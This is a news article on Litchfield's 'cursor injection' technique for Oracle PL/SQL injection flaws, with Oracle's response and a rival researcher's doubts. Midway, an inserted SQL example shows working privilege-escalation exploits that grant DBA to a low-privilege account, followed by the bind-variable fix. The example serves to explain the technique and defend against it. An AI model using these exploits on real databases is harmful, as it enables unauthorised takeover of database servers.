New hacker trick may expose Oracle databases

A new attack technique increases the risk of commonly found bugs in Oracle's database software, a security researcher has warned.

It was previously thought that an attacker needed high-level privileges on the database to exploit so-called PL/SQL injection vulnerabilities. With a new attack technique, that is no longer true, David Litchfield, a database security expert with NGS Software, said on Thursday at the Black Hat DC event in the US.

"It is a trick that can be used by attackers with minimal privileges to gain complete control of the database server," Litchfield said in an interview. "You can use the trick through a large number of vulnerabilities that were previously thought not to be that significant."

Litchfield, who has had Oracle in his crosshairs for some time, detailed his technique, dubbed "cursor injection," in a paper that was originally published last weekend and discussed at the event. Examples of attack code that use the technique have already appeared, Litchfield said.

Oracle is aware of the new attack technique, it said in a statement.

"NGS Software's 'Cursor Injection' paper describes a technique that may assist an attacker in exploitation of SQL injection vulnerabilities," the database software maker said. Oracle urges its customers to apply patches it has provided to fix known flaws.

In the past, exploiting a PL/SQL injection flaw typically required the "create procedure" privilege, because the attacker had to create a function of his own to call from the injected SQL, and most users don't have that privilege. Using the cursor injection technique, anyone who can connect to the database can exploit such flaws, Litchfield said.

"This is achieved by injecting a pre-compiled cursor into vulnerable PL/SQL objects," Litchfield wrote in his paper. "The driving force behind this research is to show that all SQL injection flaws can be fully exploited without any system privilege other than 'create session.'"
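The two exploitation paths the article contrasts, as an added example that is not from Litchfield's paper, from the article or from any Oracle code: a hypothetical definer's-rights procedure that splices its argument into dynamic SQL, the classic exploit that needs "create procedure", the cursor-injection variant that needs only "create session", and the bind-variable fix on the vulnerable side. The schema, table and object names (APPOWNER, LOWPRIV, items, count_items, escalate) and the one seeded row are constructed for illustration; no real Oracle package is referenced.

```sql
-- Constructed, hypothetical setup: APPOWNER is assumed to be a DBA-privileged
-- schema; LOWPRIV is assumed to hold only CREATE SESSION. Neither exists on
-- any real system and no real Oracle package is referenced.

-- 1. The vulnerable object: a definer's-rights procedure, owned by APPOWNER
--    and executable by PUBLIC, that concatenates its argument into dynamic SQL.
CREATE TABLE appowner.items (name VARCHAR2(100));
INSERT INTO appowner.items VALUES ('widget');  -- one row, so the WHERE clause is evaluated
COMMIT;

CREATE OR REPLACE PROCEDURE appowner.count_items (p_name IN VARCHAR2)
AUTHID DEFINER AS
  l_cnt NUMBER;
BEGIN
  -- Injection point: p_name is spliced into the statement text, not bound.
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM appowner.items WHERE name = ''' || p_name || ''''
    INTO l_cnt;
END;
/
GRANT EXECUTE ON appowner.count_items TO PUBLIC;

-- 2. Classic exploitation, which needs CREATE PROCEDURE on the attacker's side.
--    LOWPRIV defines an invoker's-rights function; when the definer's-rights
--    procedure's SQL calls it, the current user is APPOWNER, so the GRANT runs
--    with APPOWNER's privileges. The autonomous transaction is required because
--    a function called from SQL may not otherwise run DDL or commit.
CREATE OR REPLACE FUNCTION lowpriv.escalate RETURN VARCHAR2
AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO lowpriv';
  COMMIT;
  RETURN '';
END;
/
GRANT EXECUTE ON lowpriv.escalate TO PUBLIC;

-- Resulting statement inside count_items:
--   SELECT COUNT(*) FROM appowner.items WHERE name = 'x' || lowpriv.escalate() || ''
BEGIN
  appowner.count_items('x'' || lowpriv.escalate() || ''');
END;
/

-- 3. Cursor injection: the same result with only CREATE SESSION (DBMS_SQL is
--    executable by PUBLIC by default). The attacker parses the payload in a
--    cursor it owns, then injects a call to DBMS_SQL.EXECUTE on that cursor
--    handle; the payload runs inside APPOWNER's definer's-rights context.
DECLARE
  c NUMBER;
BEGIN
  c := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(c,
    'DECLARE PRAGMA AUTONOMOUS_TRANSACTION; ' ||
    'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO lowpriv''; COMMIT; END;',
    DBMS_SQL.NATIVE);
  -- Resulting statement inside count_items:
  --   ... WHERE name = 'x' || DBMS_SQL.EXECUTE(<c>) || ''
  appowner.count_items('x'' || DBMS_SQL.EXECUTE(' || c || ') || ''');
  DBMS_SQL.CLOSE_CURSOR(c);
END;
/

-- 4. The fix on the vulnerable side: bind the value instead of splicing it.
--    The attacker's text is now data, so neither path above has anything to inject into.
CREATE OR REPLACE PROCEDURE appowner.count_items (p_name IN VARCHAR2)
AUTHID DEFINER AS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM appowner.items WHERE name = :n'
    INTO l_cnt USING p_name;
END;
/
```

Two practical points. First, the preconditions are exactly the ones the technique depends on: a definer's-rights unit owned by a privileged schema, dynamic SQL built by concatenation, and the injected expression actually being evaluated (here the table is seeded so the WHERE clause is reached). Second, from Oracle 11g onward DBMS_SQL raises ORA-29470 when a cursor is executed under a different effective user or role set than the one it was parsed with, which closes step 3 on those versions; on older releases the only defence is fixing the concatenation as in step 4 and applying the vendor patches.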

In the future, Oracle should no longer list the privilege requirements as a mitigating factor for PL/SQL flaws, Litchfield said. Such mitigating factors may lead Oracle customers to postpone patching, which puts them at risk, he said. "Excuses to not patch this particular flaw are now gone," Litchfield said.

But while Litchfield argues that his findings increase the severity of a large number of Oracle vulnerabilities, another prominent database security researcher disagrees.

"David's example works only if someone creates a vulnerable package with special privileges and special dynamic statements in a high-privileged account," said Alexander Kornbrust, who runs Germany's Red Database Security. "During my entire time reviewing PL/SQL source code I never found such an incident, and I checked a lot of PL/SQL source code from many customers and companies."

Oracle has been at loggerheads with security researchers for a couple of years. However, the company is changing and has been more candid about its product security processes. In January, Oracle started offering advance notification for its quarterly patch releases. In October, it included severity ratings for the first time.
